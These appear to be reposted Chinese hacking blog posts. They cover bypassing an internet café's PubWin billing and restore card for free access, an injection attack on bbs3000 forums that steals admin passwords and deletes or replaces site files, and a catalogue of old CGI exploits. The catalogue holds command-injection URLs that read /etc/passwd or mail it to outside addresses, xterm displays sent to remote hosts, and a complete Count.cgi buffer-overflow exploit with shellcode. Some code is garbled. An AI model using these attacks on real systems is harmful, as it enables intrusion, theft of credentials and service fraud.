本文转自:
http://hi.baidu.com/mignoncat/blog/item/1e131c2f6e8bd63d1f308992.html

美萍和万象已经是过去了，现在有出现一些新的网吧记费管理系统---punwin，呵呵，在
网上搜一下关于破解pubwin的方法，怎么样？是不是少之又少？我们这边新开了一家网吧
，刚好记费管理系统就是pubwin，也是我们这边唯一的一个安装pubwin的网吧，对于喜欢
玩新事物的我当然要玩玩啦~~！相信你们那边也一定安了吧？好了 废话少说，下面让我
介绍一下如何对付pubwin的方法吧！虽然没有抓图，不过我会尽量说的详细些，保证你能
看懂。
虽然我我经常突破网吧的限制，但是，这个网吧的网管也不是吃素的，为了便于保护，他
早就把全部都设为虚拟桌面了，机子的操作系统也是windowsXP的，看看能不能进入cmd，
我找了半天也没有找到“开始”。试着进入它的C盘看看，打开IE浏览器，在地址栏里输
入c:\，晕，连C盘都禁止了，不用说了，其他的文件一定也禁止了，下载一个软件试试，
哈哈，没有禁止下载，下载前先看看有没有还原精灵，我左找右找还是没找到，这回可以
放心下载了，（注意：下载到桌面，然后会出现一个下载进程的窗口，这是要找到“下载
完毕后关闭该对话框”看看它前的方框里面有没有小钩，如果有就把它去掉）下载完毕后
不要去点击“关闭”，要点击“打开”，（玩着玩着就死机了，只好重启机，后来才知道
，原来有还原精灵）在重启是看到一个桌面，后来有试了一下，原来是真实桌面。好了，
以上是网吧的具体情况，下面说一说具体的对策吧！首先是卸载pubwin,卸载前定一个大
概的思路吧：
1.先破解还原卡
2.进入注册表
3.利用真实桌面
4.结束卸载
5.结束突破，免费上网
首先去网吧的收费台定时，15分钟足矣！开始行动，首先我们来破解它的还原卡，让我来
给大家介绍一下吧，
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了 还原卡的
密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置。一般还原卡都有
默认密码的,默认密码怎么找,很简单,到网上搜索关键词"还原卡"就行了,找到你用的那个
牌子的还原卡,一般可以找到默认密码的.台湾远志牌的还原卡的默认密码是12345678, 小
哨兵的是manager, 而管理员已经把密码改了，所以只好自己破解了。具体过程如下: 
开机过程按住F8键,进入纯dos环境, 注";"后为注释. 
出现提示符c:, 
键入c:\debug, 
- a100 
- xor ax,ax 
- int 13 
- int3 
; 寻找原始的int 13入口. 然后输入t回车，不断的重复，直到显示的地址形如
F001:xxxx ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 记下这一地址, 在
(0:13H*4)=0:4cH 处填入这个地址。 
例如，我的得到的地址是F001:9A96 
再次运行debug ,键入: 
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中. 
-q 
破解完成。设为不还原就可以了，打开浏览器，点击上面的“查看--->源文件”，把里面
的代码全部删除，输入如下内容：
REGEDIT4

[HKEY_CURRENT_USER、Software\Microsoft\Windows\CurrentVersion\Policies\System]

"DisableRegistry Tools"=dword:00000000
以上是解除“禁止使用注册表编辑”。接下来就是解除其它所有禁止的功能，好了把C盘
设为可访问吧（在网上有一系列的关于注册表解锁的代码，这里笔者就不一一叙述了）。
好了，时间也差不多了，开始卸载pubwin客户端吧。重启机，刚刚出现桌面时点击开始把
鼠标移到“所有程序”上（速度要快，否则很快就会变成虚拟桌面）好了下面点击子菜单
里的“Hintsoft"会出现一个子菜单，点击子菜单中的”网吧管理客户端“还会出现一个
子菜单这时点击“卸载”，然后一路点击“是”就可以卸载了，重启机生效。卸载完了。
这时就自由了。
卸载pubwin的方法就介绍完了，你可以免费上网了。
下面介绍一下破解pubwin密码的方法吧，首先下载winhex,然后打开RemEditor,找到
pubwin#（*****）（注意：*****是数字，例如：429856784）双击pubwin，在下面的列表
中选中PrimaryMemory，然后查找:004300D0，好了，后面就有管理员密码了，密码也破解
完了做你自己想做的事吧！
你还可以通过在地址栏里输入ftp://ip然后登陆失败，你就可以看到网上邻居和其他的东
西，如果有写权限你还可以搞搞破坏，呵呵！好了，全部都介绍完了！
在开机以后立即进入DOS
然后找到OCTOPUS的文件夹把其名称改为任意的名字
哈哈~~~~~~~~
之后就可以进入WIN 了
这时你的键盘会死掉 
不难把他拔掉再插进去就可以了

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)

本文转自:
http://hi.baidu.com/mignoncat/blog/item/806dc890a555728ba977a4ad.html

先上网搜索一个bbs3000的论坛，在google.com键入”bbs/list.cgi“，出来了一大堆，看到一个粘贴美女图的论坛很不爽，就拿你开刀。先注册一用户名为;字符，密码为空格，信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
（这里假设admin为该论坛的社区区长，也就是该论坛最大权限的用户,readme.txt 为自己随便起的一个txt文件），然后我们在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名，下同）
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了，再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊，事情怎么那么容易呀！！~_*
再修改资料把信箱改成rename "readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了，之后你就可以，哈哈，不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin，密码admin，我靠，居然不行，区长设置的管理密码和他的用户密码不一样。那好，我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名，下同）
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了，再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin，密码为admin123，返回登入管理界面，靠，现在是什么都不行了，因为论坛缺少了setup.cgi这个文件，所有的cgi都打不开了，拿了密码也没有用了。下线，等斑竹自己修复，我还要去背单词，要考试了。（可能你们要问为什么邮箱不用copy "../setup.cgi","readme.cgi";#@3wcool.com，我试过，没用，可能是权限不够）
到了晚上再来看看论坛已经修好了，我不罢休换个思路再来。
我先发表了一篇文章，随便写点，肯定会被删的东西。然后用论坛上传文件的功能，上传了一个bbs3000原程序中的setup.cgi，自己定义好管理员帐号，密码；再改成的read.txt文件，因为后缀是cgi的文件，论坛不支持。发表后查看那个read.txt文件的路径为
http://x.x.x.x/bbs/image/affix/20010615135901.txt
好的， 抄出旧刀，把;的邮箱改成
rename "../../bbs/20010615135901.txt","../setup.cgi";#@3wcool.com
然后在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
好，这下就可以用自己定义的帐号，密码登入管理界面了.
在狠一点，把邮箱改改，上传一个首页把它的首页更换掉。
哈，怎一个爽字了的。
心情好的时候，一口气背了100面单词…………

有几点值得注意的：
1：此漏洞对于目前发行的一切bbs3000版本都通吃。
2：此漏洞只存在与win2000的机子，且cgi是采用应用程序映射:perlIS.dll应用程序映射的，很多空间又支持asp又支持cgi的多为这种。
3：啊，怎么有人比我先注册了；这个用户名，看来已经背他洗劫过一次了，没有关系，换个用户名1；或2；只要最后是；的什么都行，什么斑竹把用户名含；过滤掉了，拿就随便注册一个把邮箱改成
；rename "admin.cgi","readme.txt";#@3wcool.com
前面加一个；号。
好了，告诉大家一句，擅自更改删除别人的数据为违法行为，请大家不要太过分。

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)

本文转自:
http://hi.baidu.com/mignoncat/blog/item/d0483a99c0fb4f0e6f068c09.html

对于下面列出的CGI漏洞,简单的讲,可以通过直接删除程序或者改写程序来达到安全的目
的
一.phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示
/etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
但是我们还能找到它吗?
二.php.cgi 2.0beta10或更早版本的漏洞
可以读nobody权限的所有文件.
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在
/etc/master.passwd
/etc/security/passwd等.
三.whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter
m%20-display%20graziella.lame.org:0
四.faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
五.textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.
#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
20pdoru@pop3.kappa.ro,root" target="_blank">$EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothe
re_one";
}$text="${URL}/;IFS=8;${CMD};echo|";$text =~ s/ /${IFS}/g;#print "$text
n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);
六.一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd|)'
$
You have new mail.
$
说实在我不太明白.:(
七.pfdispaly.cgi
lynx -source
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi还有另外一个漏洞可以执行命令
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
lynx -dump
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evi
l:0.0|'
八.wrap
lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc
九.www-sql
可以让你读一些受限制的页面如:
在你的浏览器里输入:http://your.server/protected/something.html:
被要求输入帐号和口令.而有www-sql就不必了:
http://your.server/cgi-bin/www-sql/protected/something.html:
十.view-source
lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/pass
wd
十一.campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
十二.webgais
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"line
)
query=';mail+drazvan@pop3.kappa.roparagraph
十三.websendmail
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address@somewhere.orgubject=a&content=a
十四.handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/s
h|?data=Download
注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命
令.
十五.test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录
lynx http://www.victim.com/cgi-bin/test-cgi?help&0a/bin/cat%20/etc/passwd
这招好象并不管用.:(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
还可以这样试
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
十六.对于某些BSD的apache可以:
lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd
十七.htmlscript
lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
十八.jj.c
The demo cgi program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program running strings on it
will probably reveil the password.
Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.
十九.Frontpage extensions
如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
和它在服务器上的路径. 还有一些密码文件如:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd
二十.Freestats.com CGI
没有碰到过,觉的有些地方不能搞错,所以直接贴英文.
John Carlton found following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. Their will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple JavaScript function.
Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
二十一.Vulnerability in Glimpse HTTP
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.comMD;echo
HTTP/1.0

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)

本文转自:
http://hi.baidu.com/mignoncat/blog/item/d0483a99c0fb4f0e6f068c09.html

二十二.Count.cgi
该程序只对Count.cgi 24以下版本有效：
/*### count.c ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30"
"x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56"
"x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10"
"x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbf"
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxffxffxffxff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff"
"xffxffxffxffxffxffxffxffxffxffxff";
int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;
offset = sp = cnt = ver = 0;
fprintf(stderr,"t%s - Gus",argv[0]);
if (argc<3) usage(argv[0]);
while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
sp = offset + getsp(ver);
(void)doit(host,sp,shellcode);
exit(0);
}
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;
if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don't have an sp for that version try using the -o option.
");
fprintf(stderr,"Versions above 24 are patched for this bug.");
exit(1);
} else {
return sp;
}
}
int usage (char *name) {
fprintf(stderr,"tUsage:%s -h host -d -v [-o ]
",name);
fprintf(stderr,"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22",name);
exit(1);
}
int openhost (char *host, int port) {
int sock;
struct hostent *he;
struct sockaddr_in sa;
he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname");
exit(-1);
}
memcpy(&sa.sin_addr, he->h_addr, he->h_length);
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));
if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}
return(sock);
}
void doit (char *host,long sp, char *shellcode) {
int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";
bzero(buf);
for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;
qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/Count.cgi?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"",2);
sleep(1);
/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0User-Agent: %s",qs,qs); *
/
/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./Count.cgi");
*/
}
用Count.cgi看图片
http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../.
./../path_to_gif/file.gif
二十三.finger.cgi
lynx http://www.victim.com/cgi-bin/finger?@localhost
得到主机上登陆的用户名.
二十四.man.sh
Robert Moniot found followung. The May 1998 issue of SysAdmin
Magazine contains an article, "Web-Enabled Man Pages", which
includes source code for very nice cgi script named man.sh to feed
man pages to a web browser. The hypertext links to other man
pages are an especially attractive feature.
Unfortunately, this script is vulnerable to attack. Essentially,
anyone who can execute the cgi thru their web browser can run any
system commands with the user id of the web server and obtain the
output from them in a web page.
二十五.FormHandler.cgi
在表格里加上
你的邮箱里就有/etc/passwd
二十六.JFS
相信大家都看过"JFS 侵入 PCWEEK-LINUX 主机的详细过程"这篇文章,他利用photoads
这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样
先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31
337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%0a
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111 1111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111 111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111 1111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111 111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111 11111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111 111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111 11111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111 111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111 111111111111111111111111111&Phone=1
1&Subject=la&password=0&CityStPhone=0&Renewed=0"
创建新AD值绕过 $AdNum 的检查后用
lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jp
g&AdNum=11111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111 111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111 11111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111 111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111 11111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111 1111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111 11111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111 1111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111 1111111111111111111111111111111111111111111111&DataFile=1&Password=0&FIL
E_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/../../../
../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'
创建/覆盖用户 nobody 有权写的任何文件.
不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道?
二十七.backdoor
看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl
前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码.
二十八.visadmin.exe
http://omni.server/cgi-bin/visadmin.exe?user=guest
这个命令行将不停的向服务器的硬盘里写东西,知道写满为止.
二十九.campas
> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... 接下来你知道该干什么了吧 :P
三十.webgais
query=';mail+foo@somewhere.nettelnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan@pop3.kappa.roparagraph
telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address@somewhere.orgubject=a
&content=a
三十一.wrap
http://sgi.victim/cgi-bin/wrap?/../../../../../etc
列出etc目录里的文件
下面是可能包含漏洞的所有CGI程序名,至于其他更多的漏洞,正在收集整理中,这里也衷
心的希望得到你的批评与指教.
/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript /cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/_vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SELECTOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir....windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf /today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
adminlogin?RCpage=/sysadmin/index.stm /c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi
-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4b.htr
cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:WINNTrepairsam._
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:WINNTrepairsam._
/CFIDE/Administrator/startstop.html
/cgi-bin/wwwboard.pl
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-win/uploader.exe
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
